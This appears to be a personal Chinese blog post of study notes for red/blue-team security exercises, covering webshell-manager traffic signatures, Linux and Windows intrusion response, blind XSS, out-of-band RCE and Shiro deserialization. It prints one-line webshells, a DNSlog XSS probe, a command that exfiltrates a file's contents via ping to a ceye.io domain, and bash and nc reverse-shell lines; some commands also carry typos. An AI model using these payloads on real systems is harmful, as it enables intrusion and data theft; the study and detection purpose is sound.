<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="John Doe">
    
    
    
    
    
    
    <title>护网基本问题 | Hexo</title>
    <!-- inject:style -->
    <link href="/css/style.css" rel="stylesheet" type="text/css">
    <!-- endinject -->
    <style>
        .cube-loading {
            top: 0;
            position: fixed;
            width: 100%;
            height: 100%;
            background: url('/images/lg/loading.gif') no-repeat center center;
            background-color: rgba(0,0,0,.7);
        }

        .cube-loading.out {
            display: none;
        }

        .cube-loading:before {
            display: block;
            content: 'Loading';
            position: relative;
            width: 100%;
            top: 50%;
            right: -50%;
            color: #fff;
        }

        @media(max-width: 768px) {
            .cube-loading:before {
                font-size: 1.2em;
                transform: translate(-24px,20px);
                -webkit-transform: translate(-24px,20px);
                -o-transform: translate(-24px,20px);
                -ms-transform: translate(-24px,20px);
            }
        }

        @media(min-width: 768px) {
            .cube-loading:before {

            }
        }
    </style>
    
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
<div class="cube-body">
    <nav id="cube-top-memu" class="cube-menu">
    <ul class="cube-menu-collapse">
        
        <li>
            <i class="cube-icon cube-icon-home" aria-hidden="true"></i>
            <a href="/">首页</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-archive" aria-hidden="true"></i>
            <a href="/archives">归档</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-categories" aria-hidden="true"></i>
            <a href="/categories">分类</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-tags" aria-hidden="true"></i>
            <a href="/tags">标签</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-about" aria-hidden="true"></i>
            <a href="/about-me">关于我</a>
        </li>
        
    </ul>
</nav>
<nav class="cube-side-menu" id="cube-side-menu">
    <ul class="cube-menu-list">
        
        <li>
            <a class="lrc-control">Open Lyrics</a>
        </li>
        
        <li>
            <a class="scroll-to-top">Top</a>
        </li>
    </ul>
</nav>
    <header class="cube-header" id="cube-header">
    <img src=" https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp " alt="头部背景图片">
    
    <div class="cube-type">
        <span class="cube-typed-title">zyzhuv的私人博客</span>
        <span class="cube-typed-cursor">|</span>
    </div>
    
</header>

    <style>
        nav.cube-menu:before {
            content: '';
            visibility: hidden;
            position: absolute;
            left: 0;
            top: 0;
            width: 100%;
            height: 44px;
        
            filter: blur(1px);
            -webkit-filter: blur(1px);
        
            z-index: -1;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-repeat: no-repeat;
            background-position: center -256px;
            background-size: cover;
            background-color: transparent;
        }

        header.cube-background.cube-header-background {
            visibility: hidden;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-position: center -300px;
        }
    </style>
    <header class="cube-background cube-header-background">
        
        <div class="cube-type">
            <span class="cube-typed-title">zyzhuv的私人博客</span>
            <span class="cube-typed-cursor">|</span>
        </div>
        
    </header>
    <div class="load-header-background"></div>
    <script>
        (function (window) {

            window.headerModule = {}
            window.headerModule.image = {
                width: '2000',
                height: '1314'
            }

        })(window)
    </script>
    
    <div class="cube-content">
        <div class="cube-left">
            <div class="cube-article">
    <h1 class="title">护网基本问题</h1>
        
            <div class="cube-article-header">
                <div class="cube-article-date">
                    <i class="cube-icon cube-icon-date" aria-hidden="true"></i>
                    <!-- moment.js对象 -->
                    2024-04-18
                </div>
                <div class="cube-article-tags">
    <i class="cube-icon cube-icon-tag" aria-hidden="true"></i>
    
</div>
            </div>
            
                    <div class="cube-article-content cube-markdown">
                        
                            <h1 id="1内网横向"><a href="#1内网横向" class="headerlink" title="1内网横向"></a>1内网横向</h1><p>在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制域环境下的全部机器。</p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1890/#toc__2">https://tttang.com/archive/1890/#toc__2</a></p>
<span id="more"></span>

<h1 id="冰蝎3-0与4-0区别"><a href="#冰蝎3-0与4-0区别" class="headerlink" title="冰蝎3.0与4.0区别"></a>冰蝎3.0与4.0区别</h1><p>1. 同时冰蝎v4.0相对于3.0版本，更新了较多内容，其中<strong>包括了开放了传输协议的自定义功能</strong></p>
<p>让用户对流量的加密和解密进行自定义，实现流量加解密协议的去中心化。v4.0版本不再有连接密码的概念，你的自定义传输协议的算法就是连接密码</p>
<p>2这里新增的功能，认为也是比较好的，<code>平行空间</code>，同时也有一些扩展功能,进行内网资产发现和扫描</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/1.png" alt="护网基本问题"></p>
<h3 id="冰蝎流量检测"><a href="#冰蝎流量检测" class="headerlink" title="冰蝎流量检测"></a>冰蝎流量检测</h3><p>1.<strong>Accept字段</strong></p>
<p>Accept: application&#x2F;json, text&#x2F;javascript, <em>&#x2F;</em>; q&#x3D;0.01</p>
<p>检测思路：<br> 浏览器可接受任何文件，但最倾向application&#x2F;json 和 text&#x2F;javascript</p>
<p>2.<strong>Content-Type</strong></p>
<p>Content-type: Application&#x2F;x-www-form-urlencoded</p>
<p>检测思路：<br> 可以把这个字段作为一个弱特征，辅助其他特征来检测</p>
<p>3.<strong>User-agent 字段</strong></p>
<p>检测思路：<br> 在较短较简单的content字段后加上fast_pattern关键字则会优先匹配这个content，避免浪费太长时间在匹配user-agent上</p>
<p>snort编写可以用content：“User-Agent”；content：“浏览器版本”，来匹配相应的十个浏览器</p>
<p><strong>4、端口</strong></p>
<p>蝎与webshell建立连接的同时，javaw也与目的主机建立tcp连接，每次连接使用本地端口在49700左右(就是比较大的端口)，每连接一次，每建立一次新的连接，端口就依次增加</p>
<p><strong>5、PHP webshell 中存在固定代码</strong></p>
<p>$post&#x3D;Decrypt(file_get_contents(“php:&#x2F;&#x2F;input”));<br>eval($post);</p>
<p><strong>6、长连接</strong></p>
<p>冰蝎通讯默认使用长连接，避免了频繁的握手造成的资源开销。默认情况下，请求头和响应头里会带有 Connection</p>
<p><strong>7、连接密码</strong></p>
<p>默认时，所有冰蝎4.0 webshell都有<code>e45e329feb5d925b</code> 一串密钥，该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond</p>
<p><strong>8、webshell特征</strong></p>
<p>JSP webshell代码特征</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/2.png" alt="护网基本问题"></p>
<p>PHP webshell代码特征</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/3.png" alt="护网基本问题"></p>
<p><strong>9、请求和响应</strong></p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/4.png" alt="护网基本问题"></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_55793759/article/details/127250968">https://blog.csdn.net/m0_55793759/article/details/127250968</a></p>
<h1 id="内网权限维持"><a href="#内网权限维持" class="headerlink" title="内网权限维持"></a>内网权限维持</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12539?time__1311=mqmhD50KBKDIPiqGXIeeuR4Ix4ce==G8leD&alichlgref=https://www.google.com/">https://xz.aliyun.com/t/12539?time__1311=mqmhD50KBKDIPiqGXIeeuR4Ix4ce%3D%3DG8leD&amp;alichlgref=https%3A%2F%2Fwww.google.com%2F</a></p>
<h1 id="蚁剑流量特征"><a href="#蚁剑流量特征" class="headerlink" title="蚁剑流量特征"></a>蚁剑流量特征</h1><h3 id="1-蚁剑webshell静态特征"><a href="#1-蚁剑webshell静态特征" class="headerlink" title="1.蚁剑webshell静态特征"></a>1.蚁剑webshell静态特征</h3><p>蚁剑中php使用assert、eval执行；asp只有eval执行；在jsp使用的是Java类加载（ClassLoader），同时会带有base64编码解码等字符特征。</p>
<h3 id="2-蚁剑webshell动态特征"><a href="#2-蚁剑webshell动态特征" class="headerlink" title="2.蚁剑webshell动态特征"></a>2.蚁剑webshell动态特征</h3><p>我们使用一句话木马上传webshell，抓包后会发现每个请求体都存在以<code>@ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0)开头。</code>并且响应体的返回结果是base64编码发混淆字符，格式为：<code>随机数 结果 随机数</code>。</p>
<p>去除混淆字符（随机数）后进行base64解码，解码后响应体的返回结果的格式为：<code>随机数 解码后的结果 随机数</code>。观察payload可以发现攻击行为。</p>
<p>另外，蚁剑混淆加密后还有一个比较明显的特征，即为参数名大多以<code>“_0x.....=”</code>这种形式（下划线可替换为其他）所以，以_0x开头的参数名，后面为加密数据的数据包也可识别为蚁剑的流量特征。</p>
<h1 id="蚁剑冰蝎哥斯拉"><a href="#蚁剑冰蝎哥斯拉" class="headerlink" title="蚁剑冰蝎哥斯拉"></a>蚁剑冰蝎哥斯拉</h1><h3 id="冰蝎流量特征"><a href="#冰蝎流量特征" class="headerlink" title="冰蝎流量特征"></a>冰蝎流量特征</h3><h6 id="2-0"><a href="#2-0" class="headerlink" title="2.0"></a>2.0</h6><p>因此当发现一个ip的请求头中的user-agent在频繁变换，就可能是冰蝎</p>
<h6 id="3-0"><a href="#3-0" class="headerlink" title="3.0"></a>3.0</h6><p>使用<code>AES加密 + base64编码</code>,取消了2.0的动态获取密钥，使用固定的连接密钥，AES加密的密钥为<code>webshell连接密码的MD5的前16位，默认连接密码是&quot;rebeyond&quot;(即密钥是md5(&#39;rebeyond&#39;)[0:16]=e45e329feb5d925b)。</code>进行请求时内置了十几个User-Agent头，每次请求时会随机选择其中的一个。因此当发现一个ip的请求头中的user-agent在频繁变换，就可能是冰蝎。</p>
<p>3.0连接jsp的webshell的请求数据包中的content-type字段常见为application&#x2F;octet-stream。</p>
<h6 id="4-0"><a href="#4-0" class="headerlink" title="4.0"></a>4.0</h6><ul>
<li><p>提供了传输协议自定义的功能，让用户对流量的加密和解密进行自定义，实现流量加解密协议的去中心化。v4.0版本不再有连接密码的概念，自定义传输协议的算法就是连接密码。</p>
</li>
<li><p>Accept字段（弱特征），通常是Accept: application&#x2F;json, text&#x2F;javascript, <em>&#x2F;</em>; q&#x3D;0.01 意思是浏览器可接受任何文件，但最倾向application&#x2F;json 和 text&#x2F;javascript。</p>
</li>
<li><p>Content-Type字段（弱特征），通常是Content-type: Application&#x2F;x-www-form-urlencoded</p>
</li>
<li><p>与冰蝎的前述版本相似，进行请求时内置了十几个User-Agent头，每次请求时会随机选择其中的一个。</p>
</li>
<li><p>连接的端口有一定的特征，冰蝎与webshell建立连接的同时，java也与目的主机建立tcp连接，每次连接使用本地端口在49700左右(就是比较大的端口)，每连接一次，每建立一次新的连接，端口就依次增加。</p>
</li>
<li><p>使用长连接，避免了频繁的握手造成的资源开销。默认情况下，请求头和响应头里会带有 Connection：Keep-Alive</p>
</li>
<li><p>有固定的请求头和响应头，请求字节头：dFAXQV1LORcHRQtLRlwMAhwFTAg&#x2F;M ，响应字节头：TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd</p>
</li>
<li><p>默认时，冰蝎 webshell都有“e45e329feb5d925b” 一串密钥，与冰蝎3.0相同。</p>
<h6 id="哥斯拉流量特征"><a href="#哥斯拉流量特征" class="headerlink" title="哥斯拉流量特征"></a>哥斯拉流量特征</h6></li>
<li><p>哥斯拉支持多种加密方式，采用了和冰蝎 2.0 类似的密钥交换方式。它的webshell需要动态生成，可以根据需求选择不同的加密方式。</p>
</li>
<li><h5 id="1-哥斯拉静态特征"><a href="#1-哥斯拉静态特征" class="headerlink" title="1 哥斯拉静态特征"></a>1 哥斯拉静态特征</h5></li>
<li><p>在默认脚本编码的情况下，jsp会出现<code>xc、pass字符和Java反射(ClassLoader，getClass().getClassLoader())，base64加解码</code>等特征。</p>
</li>
<li><h5 id="2-哥斯拉动态特征"><a href="#2-哥斯拉动态特征" class="headerlink" title="2 哥斯拉动态特征"></a>2 哥斯拉动态特征</h5></li>
<li><p>User-Agent字段（弱特征），如果采用默认的情况，会暴露使用的jdk信息。不过哥斯拉支持自定义HTTP头部，这个默认特征是可以很容易去除的。</p>
</li>
<li><p>Accept字段（弱特征），默认是<code>Accept:text/html, image/gif, image/jpeg, *; q=.2, /; q=.2。</code>同上，这个也可修改，只能作为辅助检测的特征。</p>
</li>
<li><p><code>Cookie中有一个非常关键的特征，最后会有个分号</code>。估计后续的版本会修复。</p>
</li>
<li><p>响应体的数据有一定特征，哥斯拉会把一个32位的md5字符串按照一半拆分，分别放在base64编码的数据的前后两部分。整个响应包的结构体征为：md5前十六位+base64+md5后十六位。</p>
</li>
</ul>
<h6 id="4-菜刀流量特征"><a href="#4-菜刀流量特征" class="headerlink" title="4. 菜刀流量特征"></a>4. 菜刀流量特征</h6><h4 id="1-菜刀静态特征"><a href="#1-菜刀静态特征" class="headerlink" title="1 菜刀静态特征"></a>1 菜刀静态特征</h4><p>菜刀使用一句话木马，特征十分明显，在PHP、ASP、ASP.NET的网站都可以：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">PHP:  &lt;?php @eval([$_post[&#x27;test&#x27;]]); ?&gt;</span><br><span class="line">ASP:  &lt;% eval request(&quot;test&quot;)%&gt;</span><br><span class="line">ASP.NET:  &lt;%@ Page Language=&quot;Javascript&quot;%&gt;&lt;% eval(Request.Item[&quot;test&quot;],&quot;unsafe&quot;);%&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="2-菜刀动态特征"><a href="#2-菜刀动态特征" class="headerlink" title="2 菜刀动态特征"></a>2 菜刀动态特征</h4><ul>
<li>payload在请求体中，采用url编码+base64编码，payload部分是明文传输。</li>
<li>payload中有eval或assert、base64_decode这样的字符。</li>
<li>payload中有默认固定的&amp;z0&#x3D;QGluaV9zZXQ…这样base64加密的攻击载荷，参数z0对应$_POST[z0]接收到的数据，且固定为QGluaV9zZXQ开头。进行base64解码后可看到代码：@ini_set(“display_errors”,”0”);@set_time_limit(0);@set_magic_quotes_runtime(0);这段意思是首先关闭报错和magic_quotes，接下来去获取主机的信息。</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-andrea/p/17473499.html">https://www.cnblogs.com/-andrea/p/17473499.html</a></p>
<h1 id="mysql5-7与8-0的区别"><a href="#mysql5-7与8-0的区别" class="headerlink" title="mysql5.7与8.0的区别"></a>mysql5.7与8.0的区别</h1><p><strong>1、性能提升；2、新的默认字符集；3、更好的错误日志；4、提供了角色的概念；5、增强的JSON支持</strong>。 从整体来看，MySQL 8.0在性能和功能上都做了较大的提升。 MySQL 8.0相较于5.7在性能上进行了显著的提升，包括查询优化、增加了性能架构以及事务处理等等</p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/bc13c572c517">https://www.jianshu.com/p/bc13c572c517</a></p>
<h1 id="linux入侵检测与window"><a href="#linux入侵检测与window" class="headerlink" title="linux入侵检测与window"></a>linux入侵检测与window</h1><p><strong>被入侵的症状有：</strong></p>
<ol>
<li>系统资源</li>
<li>用户和日志</li>
<li>文件和命令被篡改</li>
<li>启动项和定时任务</li>
</ol>
<p>1.<strong>系统出现明显的卡顿</strong>  看CPU、内存、磁盘的状态</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">top -c -o %CPU    排序CPU占比多的程序</span><br><span class="line">top -c -o %MEM    排序内存占比多的程序</span><br><span class="line">df -Th    查看磁盘内容</span><br></pre></td></tr></table></figure>

<p>2<strong>当主机被利用去扫描其他的主机需要占用大量的网络资源</strong> 看网络连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">lsof -i    查看网络的网络连接</span><br><span class="line">netstat -antpl   查看端口的连接</span><br><span class="line">istables -L    查看防火墙的规则</span><br></pre></td></tr></table></figure>

<p>3<strong>无论是恶意脚本还是程序的启动都存在一个进程</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ps -ef   </span><br><span class="line">UID          PID   PPID         C        STIME       TTY       TIME         CMD</span><br><span class="line">进程拥有者   进程ID 父进程ID  CPU占用率  进程启动时间  终端设备  开启的时间  进程名称或路径</span><br><span class="line">ps -aux</span><br><span class="line">USER        PID    %CPU        %MEM           VSZ                RSS          TTY     STAT     START         TIME            COMMAND</span><br><span class="line">启动的用户  进程ID  CPU占用率  内存使用量  程序完全驻留需要的内存  实际占用内存  终端设备  进程状态  启动时间点  进程执行到现在总时间  启动命令</span><br></pre></td></tr></table></figure>

<h4 id="关于Linux用户和日志的排查"><a href="#关于Linux用户和日志的排查" class="headerlink" title="关于Linux用户和日志的排查"></a>关于Linux用户和日志的排查</h4><p><strong>当系统被入侵之后可能会写入一个用户后门，使得黑客可以使用自己写入的用户进行 登录</strong> 看系统用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">awk -F: &#x27;$3==0&#123;print $1&#125;&#x27; /etc/passwd    查看UID为0的超级用户</span><br><span class="line">who    当前已登录的用户</span><br><span class="line">w      显示已登录的用户且在执行的命令</span><br><span class="line">last   查看登录成功的用户</span><br><span class="line">lastb  查看最近登录失败的用户</span><br><span class="line">lastlog   查看所有用户最近登录的时间</span><br><span class="line">cat /etc/passwd    查看用户信息</span><br></pre></td></tr></table></figure>

<p><strong>查看登录日志，文件、软件下载日志。脚本需要不用的依赖包，当被写入脚本，脚本的运行则会去联网下载一些依赖包</strong>  审计日志</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/var/log/message    整体日志</span><br><span class="line">/var/log/cron   定时任务日志</span><br><span class="line">/var/log/yum.log   查看下载日志</span><br><span class="line">/var/log/secure    系统应用登录日志</span><br><span class="line">history  历史命令</span><br></pre></td></tr></table></figure>

<h3 id="Linux应急措施"><a href="#Linux应急措施" class="headerlink" title="Linux应急措施"></a>Linux应急措施</h3><p>1隔离主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">拔网线</span><br></pre></td></tr></table></figure>

<p>2.阻断通信</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">不允许指定流量进出服务器，因为在机器被控制之后肯定会做大量的对外扫描、下载和攻击</span><br><span class="line">iptables -A INPUT -s 可疑地址 -j DROP    按照源IP地址禁用</span><br><span class="line">iptables -A OUTPUT -d 可疑地址 -j FROP   根据目的地址来禁用</span><br></pre></td></tr></table></figure>

<p>3清除病毒删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">kill -9 [pid]    杀死进程</span><br><span class="line">lsof -p [pid]     看以这个pid相关的大看的文件</span><br><span class="line">kill -9 -[pid]    杀死进程组</span><br></pre></td></tr></table></figure>

<p>4.可疑用户删除</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/passwd  看系统的用户账号的基本信息</span><br><span class="line">cat /etc/shadow  看用户账号加密密码与登录限制</span><br><span class="line">userdel 删除用户</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ol start="5">
<li></li>
</ol>
<p>杀毒、恢复服务、甚至重装系统<br>如果黑客对服务器修改的文件太多，亦或者是黑客种下的木马病毒太多，我们已经对服务器没有掌控权限或者修复时间太高与得到的效益不成正比，那么建议重装系统</p>
<h2 id="Windows入侵排查"><a href="#Windows入侵排查" class="headerlink" title="Windows入侵排查"></a>Windows入侵排查</h2><p><strong>被入侵的症状有</strong>：</p>
<ol>
<li>异常特征</li>
<li>系统账号</li>
<li>检查异常端口、进程</li>
<li>启动项、计划任务、服务</li>
</ol>
<h4 id="异常特征的排查"><a href="#异常特征的排查" class="headerlink" title="异常特征的排查"></a>异常特征的排查</h4><ol>
<li>操作异常：<strong>系统卡顿、报错、重启、蓝屏</strong></li>
<li>资源异常：<strong>CPU、内存、磁盘、网络</strong></li>
<li>文件异常：<strong>加密文件、恶意文件、隐藏文件</strong></li>
<li>设备告警：<strong>防火墙告警、杀软告警、态势感知等平台</strong></li>
</ol>
<h4 id="Windows系统账号的排查"><a href="#Windows系统账号的排查" class="headerlink" title="Windows系统账号的排查"></a>Windows系统账号的排查</h4><p>1。设过弱口令吗</p>
<p>2.是否开放3389端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -an | grep 3389</span><br></pre></td></tr></table></figure>

<p>3看有无隐藏账号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user</span><br></pre></td></tr></table></figure>

<p>4.异常端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano    查看端口号，最后一位PID为进程号</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tasklist | findstr &quot;进程号&quot;</span><br><span class="line">taskkill /f /t /in &quot;应用名称&quot;    通过上方的命令找到应用名称并且杀死</span><br></pre></td></tr></table></figure>

<p>5查找进程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">win+r：msinfo32    显示所有进程、将异常的程序进行着重排查，如果不确定改程序是否存在病毒，可以将此程序放置云沙箱</span><br></pre></td></tr></table></figure>

<p>6.任务管理器</p>
<p>看cpu占有率</p>
<p>看启动项（注册表）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">开始    所有程序    启动</span><br><span class="line"></span><br><span class="line">注册表：</span><br><span class="line">HKEY_CURRENT_USER\software\micorsoft\windows\currentversion\Run</span><br><span class="line">HKEY_CURRENT_USER\software\micorsoft\windows\currentversion\run</span><br><span class="line">HKEY_CURRENT_USER\software\micorsoft\windows\currentversion\Runonce </span><br><span class="line"></span><br><span class="line">火绒    安全工具    启动项</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>2计划任务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">taskschd.msc</span><br><span class="line">compmgmt.msc</span><br><span class="line">schtasks.exe</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>3.服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">services.msc</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>4组策略</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gpedit.msc</span><br><span class="line">Windows设置		脚本[启动/关机]	双击[启动]</span><br><span class="line">添加的脚本或者PowerShell</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_60600840/article/details/131025075">https://blog.csdn.net/qq_60600840/article/details/131025075</a></p>
<h1 id="xss无回显"><a href="#xss无回显" class="headerlink" title="xss无回显"></a>xss无回显</h1><p>一般xss漏洞的判断标准时弹框，但这个没回显判断不出没有xss，</p>
<p>这个时候用xss盲打来进行攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=http://xss.t7y3wc.dnslog.cn&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/5.png" alt="护网基本问题"></p>
<p>我们可以用dnslog来验证，src时上传的参数时地区域名</p>
<p>如果他会解析参数</p>
<p>这里就会出现，dns query看到就会出现信息</p>
<p><img src="/2024/04/18/%E6%8A%A4%E7%BD%91%E5%9F%BA%E6%9C%AC%E9%97%AE%E9%A2%98/6.png" alt="护网基本问题"></p>
<p>证明了有xss漏洞</p>
<h5 id="alert-document-cookie"><a href="#alert-document-cookie" class="headerlink" title="alert(document.cookie)"></a>alert(document.cookie)</h5><h1 id="无回显rce"><a href="#无回显rce" class="headerlink" title="无回显rce"></a>无回显rce</h1><p>1</p>
<p>ls &gt; 1.txt</p>
<p>访问即可</p>
<p>2。dnslog外带数据法</p>
<p>看到这个ping命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">include(&quot;where_is_flag.php&quot;);</span><br><span class="line">echo &quot;ping&quot;;</span><br><span class="line">$ip =(string)$_GET[&#x27;ping&#x27;];</span><br><span class="line">$ip =str_replace(&quot;&gt;&quot;,&quot;0.0&quot;,$ip);</span><br><span class="line">system(&quot;ping  &quot;.$ip);</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ping `cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io</span><br><span class="line"># 因为域名中不允许有空格，但是php代码中可能会含有空格，所以使用sed命令将php代码的空格替换为xx</span><br><span class="line">s是替换</span><br><span class="line">g是整个输入文本</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.5.90/?ping=`cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io</span><br></pre></td></tr></table></figure>

<p>可以在dns query看到where_is_flag.php内容</p>
<p>3反弹shell</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/pursue-security/p/15406672.html">https://www.cnblogs.com/pursue-security/p/15406672.html</a></p>
<p>bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;ip&#x2F;port 0&gt;&amp;1</p>
<p>nc -e &#x2F;bin&#x2F;sh ip port</p>
<h1 id="Apache-Shiro反序列化漏洞：-Shiro-rememberMe（Shiro-550）、Shiro-Padding-Oracle"><a href="#Apache-Shiro反序列化漏洞：-Shiro-rememberMe（Shiro-550）、Shiro-Padding-Oracle" class="headerlink" title="Apache Shiro反序列化漏洞： Shiro rememberMe（Shiro-550）、Shiro Padding Oracle"></a>Apache Shiro反序列化漏洞： Shiro rememberMe（Shiro-550）、Shiro Padding Oracle</h1><h1 id="Attack-Shiro-721-550与721的区别"><a href="#Attack-Shiro-721-550与721的区别" class="headerlink" title="Attack(Shiro-721)550与721的区别"></a>Attack(Shiro-721)550与721的区别</h1><h3 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h3><p>Apache Shiro框架进行登录，服务端在接收cookie时，会经过下面的流程：</p>
<p>1、检索RememberMe Cookie的值</p>
<p>2、Base64解码</p>
<p>3、AES解密（加密密钥硬编码）</p>
<p>4、进行反序列化操作（未过滤处理）</p>
<p>5、攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造用户的Cookie，服务端反序列化时触发漏洞，从而执行命令</p>
<h4 id="主要区别"><a href="#主要区别" class="headerlink" title="主要区别"></a>主要区别</h4><p>Shiro550使用已知<code>密钥碰撞</code>，只要有足够密钥库（条件较低），不需要Rememberme Cookie</p>
<p>Shiro721的aes加密的key基本猜不到，系统随机生成,需要利用有效的rememberMe Cookie去爆破key，来构造RememberMe Cookie 值,来实现反序列化漏洞攻击</p>
